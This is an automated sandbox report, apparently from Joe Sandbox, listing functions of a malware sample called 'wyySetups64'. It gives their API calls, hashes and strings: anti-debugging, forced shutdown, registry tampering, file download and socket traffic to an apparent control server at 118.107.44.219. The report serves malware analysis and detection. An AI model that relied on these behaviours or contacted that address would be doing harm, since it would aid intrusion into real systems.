                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                              • Opcode ID: b61855fa94e40dc3abb09400e911f03a36072edf8dabeada87b5b262400841c5
                                                                                                                                                                                                              • Instruction ID: 71e98e049e8562ddeb1a309a7489f0eb371392b9f84ff8e67cab2a4e2a2b9960
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b61855fa94e40dc3abb09400e911f03a36072edf8dabeada87b5b262400841c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1521CAB8814284EFD711DF69EDCA6587BA8FB08348F61515AE5099F360EFB479808F02
                                                                                                                                                                                                              Function 0337F00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0338131C
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03381331
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(033925B8), ref: 0338133C
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 03381358
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0338135F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                              • Opcode ID: d5842853d8f613967df0e2540a355572f0cca3f8767556ec79320d9dd05d8e11
                                                                                                                                                                                                              • Instruction ID: 6f413024722667e83f48d5a7fd481faa876ef2f492c1c74eab9583fe0be94ab8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5842853d8f613967df0e2540a355572f0cca3f8767556ec79320d9dd05d8e11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821CEB9944309EFD750FF28F5C46493BACBB08706F50845BE908DA388EBB29990CF55
                                                                                                                                                                                                              Function 0337B43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                                • Part of subcall function 03377B70: OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                                • Part of subcall function 03377B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                                • Part of subcall function 03377B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 0337B44D
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 681424410-0
                                                                                                                                                                                                              • Opcode ID: 8b737351b07e6f2264788998ca3f68492156df8bd6d7eb81968dbbba28c83b1a
                                                                                                                                                                                                              • Instruction ID: f1e2ae199e12250900544d3b63c061d44545349f2140e2290d44e0a24f38c0e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b737351b07e6f2264788998ca3f68492156df8bd6d7eb81968dbbba28c83b1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC08C3674020412D224B3B47CEABBBB340DB88322F00042FA60ACC1C00C5B84A041E6
                                                                                                                                                                                                              Function 0337B41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                                • Part of subcall function 03377B70: OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                                • Part of subcall function 03377B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                                • Part of subcall function 03377B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000004,00000000), ref: 0337B429
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 681424410-0
                                                                                                                                                                                                              • Opcode ID: f5d7cf2b64d21f224ac4706b36e82e74800c5c8421cc03c38b8da2b48a494b79
                                                                                                                                                                                                              • Instruction ID: f58cf54e1616e0cdeda81d97be01292a68c77dbb387452775cc68cfac20ab8af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d7cf2b64d21f224ac4706b36e82e74800c5c8421cc03c38b8da2b48a494b79
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1C08C3674020416D224B3B47CEABBAB340DB88322F00042FA70ACC1C00C6B849001EA
                                                                                                                                                                                                              Function 0337B463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 03377B89
                                                                                                                                                                                                                • Part of subcall function 03377B70: OpenProcessToken.ADVAPI32(00000000), ref: 03377B90
                                                                                                                                                                                                                • Part of subcall function 03377B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03377BB6
                                                                                                                                                                                                                • Part of subcall function 03377B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03377BCC
                                                                                                                                                                                                                • Part of subcall function 03377B70: GetLastError.KERNEL32 ref: 03377BD2
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BE0
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000005,00000000), ref: 0337B471
                                                                                                                                                                                                                • Part of subcall function 03377B70: CloseHandle.KERNEL32(?), ref: 03377BFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 681424410-0
                                                                                                                                                                                                              • Opcode ID: fc5727b044b09dc24563f5426f54aef74a9645fb7906891e41c46ee0aee87f83
                                                                                                                                                                                                              • Instruction ID: d740a3025c6e71df23cd2ba68c0341f5cc9732015878c634cddd76a971118d56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc5727b044b09dc24563f5426f54aef74a9645fb7906891e41c46ee0aee87f83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FC08C3674020412D224B3B47CEABBBB344DB88322F00042FA70ACC1C00C5B849001E6
                                                                                                                                                                                                              Function 0337B556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 0337B586
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 0337B596
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 0337B5B3
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B5D4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337B61B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B63C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337B72C
                                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0337B737
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F756
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F770
                                                                                                                                                                                                                • Part of subcall function 0337F707: __CxxThrowException@8.LIBCMT ref: 0337F781
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                                                                                                                              • String ID: 118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                                                                                                                              • API String ID: 1186799303-3661167401
                                                                                                                                                                                                              • Opcode ID: 1025fd862e930a853bfda252ff0679b5c0133f7a1bff18c042bfb7aedf08217c
                                                                                                                                                                                                              • Instruction ID: 4f81920fe94f019e33306e3046504d8e2974960b609408745602b13497b642fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1025fd862e930a853bfda252ff0679b5c0133f7a1bff18c042bfb7aedf08217c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C341E275B80300FFFA21EB109CC7F6E7358AF45B11F144056FA146E283E6E9A91586AA
                                                                                                                                                                                                              Function 00BD9AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9ACE
                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 00BD9ADA
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: DecodePointer.KERNEL32(00000008,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD97B6
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: TlsFree.KERNEL32(00000025,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD97D0
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BDC031
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: _free.LIBCMT ref: 00BDC034
                                                                                                                                                                                                                • Part of subcall function 00BD97A5: DeleteCriticalSection.KERNEL32(00000025,?,?,00BD76A5,00BD768B,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BDC05B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BD9AF0
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BD9AFD
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BD9B0A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BD9B17
                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9B67
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9B82
                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 00BD9B8C
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9B9D
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BAA
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BB7
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BC4
                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_00009929,?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9BE5
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00BD9BFA
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,00BD75E2,00BE7B60,00000008,00BD7776,?,?,?,00BE7B80,0000000C,00BD7831,?), ref: 00BD9C14
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD9C26
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                                                                                                                              • Opcode ID: d02334cdd8fc517f87d8c0db259ecedfe97032881212ab8ec9a8e59f087eb494
                                                                                                                                                                                                              • Instruction ID: 31958e4f77718c400eadba5e4d0543c9b9b177ebdda2bd5056ed0d6972e1f726
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d02334cdd8fc517f87d8c0db259ecedfe97032881212ab8ec9a8e59f087eb494
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D319E319007959BC739AF75AC9AE1BBAE5EB64324B18015BE405DB2B0FF348841CF41
                                                                                                                                                                                                              Function 03384014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 0338401C
                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 03384028
                                                                                                                                                                                                                • Part of subcall function 03383CF1: DecodePointer.KERNEL32(00000009,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03383D02
                                                                                                                                                                                                                • Part of subcall function 03383CF1: TlsFree.KERNEL32(00000027,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03383D1C
                                                                                                                                                                                                                • Part of subcall function 03383CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03388D48
                                                                                                                                                                                                                • Part of subcall function 03383CF1: _free.LIBCMT ref: 03388D4B
                                                                                                                                                                                                                • Part of subcall function 03383CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,03381084,0338106A,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03388D72
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0338403E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0338404B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03384058
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03384065
                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840B5
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840D0
                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 033840DA
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840EB
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 033840F8
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384105
                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384112
                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_00013E75,?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384133
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 03384148
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,03380FC1,03396278,00000008,03381155,?,?,?,03396298,0000000C,03381210,?), ref: 03384162
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 03384174
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                                                                                                                              • Opcode ID: 2ddb61838f8e992222755929409253e63c1e4053ecff06f08ca908136e5f6248
                                                                                                                                                                                                              • Instruction ID: 2d45ebec50304d8a47e9ab33e18b10d1196ce1d2af99504e8eff2f92264d464e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ddb61838f8e992222755929409253e63c1e4053ecff06f08ca908136e5f6248
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF3162B5D04B09EEDB58FF76ACC861A7FACEB45760F04091BE850C6658EB358045EF40
                                                                                                                                                                                                              Function 0337C3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                                                                                                                              • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                                                                                                              • API String ID: 3970221696-33419044
                                                                                                                                                                                                              • Opcode ID: 6f161971013b0acc1f56971d726e1b7931148ab797207a2020239ec71e541376
                                                                                                                                                                                                              • Instruction ID: 28eb35eacecd6b73ab055e62384f426c0ea01edfd0455b78c234aab5324f5f69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f161971013b0acc1f56971d726e1b7931148ab797207a2020239ec71e541376
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 275195B694031DA6EB30FB60CCC5FEF737CAF55700F004595B609AA081EA799688CBA5
                                                                                                                                                                                                              Function 03377C80 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wininet.dll), ref: 03377CC3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03377CD7
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 03377CF7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03377D16
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03377D53
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377D7E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03377D8C
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03377DDB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377DF9
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 03377E01
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03377E0D
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 03377E28
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                                                                                                              • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                                                                                                              • API String ID: 1463273941-1099148085
                                                                                                                                                                                                              • Opcode ID: 24845e06246e724cdcab3c70aaef93c10be4ad7a320b0112e9db2c97b382dd7d
                                                                                                                                                                                                              • Instruction ID: 2cc27733687cae9b7757fe614a570e5206bbe3fa9326fbdd1e4b949763383188
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24845e06246e724cdcab3c70aaef93c10be4ad7a320b0112e9db2c97b382dd7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C416471A4021CEBDB30EB648C85FEEB3B8BF44700F14C599E644A6180DE745A858FD4
                                                                                                                                                                                                              Function 03374530 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0337455A
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 0337457B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337459B
                                                                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 033745BD
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 033745D7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03374620
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03374644
                                                                                                                                                                                                              • send.WS2_32(?,033949C0,00000010,00000000), ref: 03374668
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03374686
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03374691
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 0337469F
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 033746B3
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 033746BD
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 033746F6
                                                                                                                                                                                                              • SetLastError.KERNEL32(000005B4), ref: 0337470A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337472B
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 03374743
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
